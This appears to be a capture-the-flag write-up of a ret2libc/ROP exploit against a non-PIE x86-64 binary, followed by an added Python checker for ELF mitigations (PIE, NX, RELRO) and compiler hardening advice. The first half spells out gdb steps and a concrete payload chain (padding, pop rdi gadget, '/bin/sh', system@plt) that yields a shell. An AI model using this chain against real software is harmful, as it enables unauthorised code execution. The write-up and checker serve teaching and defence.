The binary ships with its own libc (libc.so.6). Because NX is on, we cannot inject shellcode. The easiest path is:
The binary already has a puts@plt, so we can build a first stage that prints the address stored in the GOT for puts. The second stage then calls system.
Using gdb:
(gdb) r
(gdb) break *0x0040145a # after the vulnerable read returns
(gdb) run
After sending >64 bytes we see the saved RIP overwritten with our data.
Thus, a simple return-to-libc or ROP attack can be used.
Second payload (sent after the program restarts at main):
[padding (72)]
pop rdi ; ret -> 0x4014b3
<binsh_addr> -> address of "/bin/sh" in libc
system@plt -> 0x4006b0
No need for a further return; after system we get an interactive shell.
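The write-up relies on three properties of the target: NX is enabled (no shellcode), the code addresses are fixed (no PIE, so the gadget and PLT addresses are known up front), and the GOT is readable through puts. The following script is an added example, not part of the original write-up, that lets a defender confirm those build properties on any ELF64 binary by parsing the ELF header and program headers directly with the standard library; the sample image it builds for testing is constructed here and is not the write-up's binary.

```python
"""Report exploit mitigations compiled into an ELF64 binary.

Added example (not from the original write-up). Reads the ELF64 header and
program headers with struct only, so it runs offline. It reports:
  pie   - e_type == ET_DYN (fixed 0x40xxxx addresses in the write-up mean no PIE)
  nx    - PT_GNU_STACK present without PF_X (the write-up's "NX is on")
  relro - a PT_GNU_RELRO segment exists (partial RELRO; full RELRO additionally
          needs DT_BIND_NOW in the dynamic section, which this checker does not read)
"""
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
EHDR_SIZE = 64
PHDR_SIZE = 56


def parse_mitigations(data: bytes) -> dict:
    """Return {'pie': bool, 'nx': bool, 'relro': bool} for an ELF64 image."""
    if data[:4] != ELF_MAGIC or data[4] != ELFCLASS64:
        raise ValueError("not an ELF64 image")
    # ELF64 header offsets: e_type @16, e_phoff @32, e_phentsize @54, e_phnum @56
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    # The Linux loader treats a missing PT_GNU_STACK as an executable stack on x86,
    # so NX is only reported when the segment is present and lacks PF_X.
    nx = False
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from("<II", data, off)  # first two phdr fields
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_sample_elf(pie: bool, nx: bool, relro: bool) -> bytes:
    """Constructed, header-only ELF64 image for testing (not loadable, not the write-up's binary)."""
    phdrs = []
    # PT_GNU_STACK flags: RW (6) gives a non-executable stack, RWX (7) an executable one
    phdrs.append(struct.pack("<IIQQQQQQ", PT_GNU_STACK, 6 if nx else 7, 0, 0, 0, 0, 0, 16))
    if relro:
        phdrs.append(struct.pack("<IIQQQQQQ", PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1))
    e_ident = ELF_MAGIC + bytes([ELFCLASS64, 1, 1, 0]) + bytes(8)  # 64-bit, little-endian, v1
    ehdr = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        ET_DYN if pie else ET_EXEC, 62, 1,            # e_type, e_machine (x86-64), e_version
        0x401000, EHDR_SIZE, 0, 0,                    # e_entry, e_phoff, e_shoff, e_flags
        EHDR_SIZE, PHDR_SIZE, len(phdrs), 64, 0, 0,   # e_ehsize, e_phentsize, e_phnum, sh fields
    )
    assert len(ehdr) == EHDR_SIZE
    return ehdr + b"".join(phdrs)


def describe(path: str) -> dict:
    """Parse a binary from disk; usage: python check_elf.py ./target"""
    with open(path, "rb") as f:
        return parse_mitigations(f.read())


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        result = describe(sys.argv[1])
    else:
        # Sample matching the properties the write-up describes: no PIE, NX on.
        result = parse_mitigations(build_sample_elf(pie=False, nx=True, relro=False))
    for name, enabled in result.items():
        print(f"{name:6} {'yes' if enabled else 'no'}")
```

A binary reporting `pie no` is the case the write-up depends on: every gadget and PLT stub sits at a known address, so only the libc base has to be leaked. Building with `-fPIE -pie` and `-Wl,-z,relro,-z,now` removes both the fixed addresses and the readable, writable GOT that the first stage relies on.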